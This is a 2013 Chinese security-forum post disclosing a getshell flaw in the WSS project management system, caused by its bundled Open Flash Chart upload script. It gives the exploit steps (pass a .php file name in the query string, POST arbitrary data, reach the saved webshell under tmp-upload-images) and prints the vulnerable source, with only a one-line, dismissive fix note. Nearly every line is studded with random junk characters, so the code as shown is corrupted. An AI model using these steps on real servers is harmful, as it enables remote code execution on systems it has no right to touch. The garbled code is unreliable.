找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2174|回复: 0
打印 上一主题 下一主题

WSS项目管理系统Post get shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 12:38:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
POST 数据漏洞文件执行任意后缀文件保存6 r: x- F( \0 H, A
漏洞文件/chart/php-ofc-library/ofc_upload_image.php
: h2 ], F+ L3 [2 P9 x2 `% Q7 M5 Y/ u1 p/ J5 t" p% b
利用:
1 ~* ]4 r' C: B: V9 z' `/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名! \" q& e6 P0 e7 `+ M  B1 S
' }6 X- L# o2 N7 [9 P. t% F( r
Post任意数据5 g# e, d; Y9 J- z  }  R7 W
保存位置http://localhost/chart/tmp-upload-images/hfy.php" z9 ^; c3 W& W% ?: l5 [

  [! v2 m& f1 G6 Y3 p  v$ Q/ }1 E- L: R7 C4 r+ x5 Z& @
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~1 F/ S( u6 t9 v5 y; i
3 v3 C5 }) l8 k2 d
<?php/ g* t- V" D) r* g+ }1 v# J0 e
: d0 `4 @: M1 o, }) F5 c
//' @* Q& J& _( s, i7 u$ P* B
// In Open Flash Chart -> save_image debug mode, you
# K4 ^' Z. Z0 m" ^! `: p// will see the 'echo' text in a new window.
+ \0 b- l( }# z9 a# \; r//
1 H! ?! }! I1 g: `# L7 h) D) [# ?9 j7 B  V6 n, y/ v' y3 H
/*3 C0 K7 D$ r5 o! p/ r

! ?* W; D  P  S# [' Q: Uprint_r( $_GET );0 w6 x  Q1 k7 T- H' a
print_r( $_POST );. L7 X# s$ \4 r- _! U" r6 K
print_r( $_FILES );
! E+ d& y; n4 Y% ?# |
! R$ r& ^: e) z4 Z# I% zprint_r( $GLOBALS );
* ], c6 ?3 |2 p* V7 a, [4 x0 d  K( Yprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
* p; W- [- L& e+ x7 Z& R" @' M& M+ y2 A
*/8 _% `! u0 ?  s! n6 s6 [" U
// default path for the image to be stored //
. R0 s4 o9 d5 e$default_path = '../tmp-upload-images/';: @3 J  F( @6 R5 [
5 H/ s. q( a# V& |: @9 e
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
2 g- U7 ^4 E- F8 G' \$ A# ]: ^3 z* ^
// full path to the saved image including filename //
6 Q( W4 s8 i  P, N- L$destination = $default_path . basename( $_GET[ 'name' ] );
$ g5 t* L, T' p6 Y
6 e/ e2 E) }) e* k/ i7 hecho 'Saving your image to: '. $destination;; j) B' P6 O3 N  Z5 a
// print_r( $_POST );: N7 }2 R# |+ X. y0 ^! S( V/ T# n
// print_r( $_SERVER );' P; i0 A) l  U5 a
// echo $HTTP_RAW_POST_DATA;
9 L2 L* \, @1 k: H& t) N" F6 q* t% U$ l* D9 p0 U* h1 e
//
$ U( E3 @) S: y& V// POST data is usually string data, but we are passing a RAW .png! g2 d; y' b* z, f: ]$ k7 R9 U# F9 ]
// so PHP is a bit confused and $_POST is empty. But it has saved( y! q) r. Y/ g) E; J7 n  E
// the raw bits into $HTTP_RAW_POST_DATA
: ^. v/ ^$ X+ ^6 `//
8 D: ~$ s* R; y: T
5 b; ]2 N" p. Q* K5 a* ]: X$jfh = fopen($destination, 'w') or die("can't open file");
  b2 t$ c7 Z3 c' w* Hfwrite($jfh, $HTTP_RAW_POST_DATA);/ F/ r' M4 o7 V$ z4 y$ A
fclose($jfh);
8 W( Y$ v/ F5 z, A* }
  S4 ^& D# j4 H5 @/ f5 i; [8 o//" l+ _; }6 x7 J- |: n0 ?& J! q/ B
// LOOK:
, g# K6 Y# N! I  t: s4 [, N//+ J+ K$ m1 ~1 ]
exit();9 J* K" B6 y0 K+ w4 O9 v: G2 h1 K# m
//" x* I) n9 F" B; N7 a/ B! a
// PHP5:
) C& P8 b+ A: T. \2 v8 y//
+ u( e/ l  k9 G& ^- p1 W3 k. S, }7 H8 y1 g" D; |/ y% U6 C

3 P. p" V/ S( y+ L; x" e// default path for the image to be stored //: w9 ^, J; p5 h- b; f" ?
$default_path = 'tmp-upload-images/';
8 C& ^) ]: o0 h% @; N- E# {# C* ]) Z0 w& s- f! P9 [
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
9 Z5 Z* \- |+ J; u* W9 k) T- x5 S$ o6 o! S. t
// full path to the saved image including filename //
4 b3 ^! D8 ~( k4 o4 |6 M$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
5 r( {) T0 m/ E0 c
" [2 s8 g* `! X# m- W  [, N3 e// move the image into the specified directory //
% p$ P6 P) o& F/ Eif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {: `- `& w% d4 N9 K% H& C
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
" Y) P+ Q6 W2 C2 Q9 d} else {
; r/ o4 v) y! M3 C$ D9 @    echo "FILE UPLOAD FAILED";
2 `/ [" f5 H2 k8 _6 p  f. G}$ \3 |6 j' `" [* @: J1 X

; e* {0 D: \( }) z; P$ g' I4 T, p6 M" `$ }0 s+ q
?>
& E$ t' L. \+ k+ @+ f& j( ^+ s1 U, s+ f! g% w$ [
2 [( h. M4 k6 D7 r9 @$ r
$ H& W# e3 T3 {  [6 [

' I9 I1 j3 G9 d9 E( \* t9 N$ M0 t, @, c1 K; X

# R( N% f' y( S! a. F# _修复方案:
% `2 l* ?6 j. f这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
( }* e9 H, g% \9 t* y+ y  \
  G; D3 W) z% U
8 L0 Z* a. [: y1 E
+ M6 B- b2 o! w2 |
- p2 z* x9 V# y$ N7 P! D# s

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表